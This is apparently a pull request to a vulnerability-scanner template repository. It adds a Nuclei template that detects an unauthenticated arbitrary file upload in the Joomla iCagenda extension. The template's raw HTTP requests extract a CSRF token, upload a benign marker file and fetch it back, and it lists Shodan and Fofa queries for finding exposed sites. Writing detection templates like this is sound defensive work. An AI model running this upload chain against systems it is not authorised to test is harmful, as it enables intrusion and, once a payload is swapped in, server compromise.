### PR TITLE
Create CVE-2026-48939.yaml - Joomla iCagenda < 3.9.10 - Unauthenticated Arbitrary File Upload RCE

### DIFF
--- a/http/cves/2026/CVE-2026-48939.yaml
+++ b/http/cves/2026/CVE-2026-48939.yaml
@@ -1,0 +1,93 @@
+id: CVE-2026-48939
+
+info:
+  name: Joomla iCagenda < 3.9.10 - Unauthenticated Arbitrary File Upload RCE
+  author: 0x_Akoko
+  severity: critical
+  description: |
+    iCagenda extension for Joomla contains an unrestricted file upload vulnerability in the file attachment feature, letting attackers upload and execute arbitrary PHP code, exploit requires no special privileges.
+  impact: |
+    Attackers can upload and execute arbitrary PHP code, leading to full server compromise.
+  remediation: |
+    Update to the latest version of iCagenda extension.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-48939
+    - https://github.com/ChiefYoru/CVE-2026-48939_PoC
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-48939
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: joomlic
+    product: icagenda
+    framework: joomla
+    shodan-query: http.html:"com_icagenda"
+    fofa-query: body="com_icagenda"
+  tags: cve,cve2026,joomla,icagenda,file-upload,rce,intrusive
+
+variables:
+  marker: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        GET /administrator/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "icagenda") || contains(body, "iCagenda")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: csrf
+        group: 1
+        internal: true
+        regex:
+          - 'name="([a-f0-9]{32})"\s+value="1"'
+
+  - raw:
+      - |
+        POST /index.php?option=com_icagenda&task=registration.submit HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----iCagendaBoundary48939
+        X-Requested-With: XMLHttpRequest
+        Referer: {{BaseURL}}/
+
+        ------iCagendaBoundary48939
+        Content-Disposition: form-data; name="{{csrf}}"
+
+        1
+        ------iCagendaBoundary48939
+        Content-Disposition: form-data; name="jform[attachment]"; filename="{{marker}}.txt"
+        Content-Type: text/plain
+
+        CVE-2026-48939-FILE-UPLOAD-CONFIRMED
+        ------iCagendaBoundary48939--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200 || status_code == 303'
+        internal: true
+
+  - raw:
+      - |
+        GET /images/icagenda/frontend/attachments/{{marker}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "CVE-2026-48939-FILE-UPLOAD-CONFIRMED")'
+        condition: and


### PR DESCRIPTION
### PR Information

### Template have some Pre-conditions where The exploit chain requires the iCagenda admin to have created an event with "Registration + File Upload" enabled. The feature should turned on

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
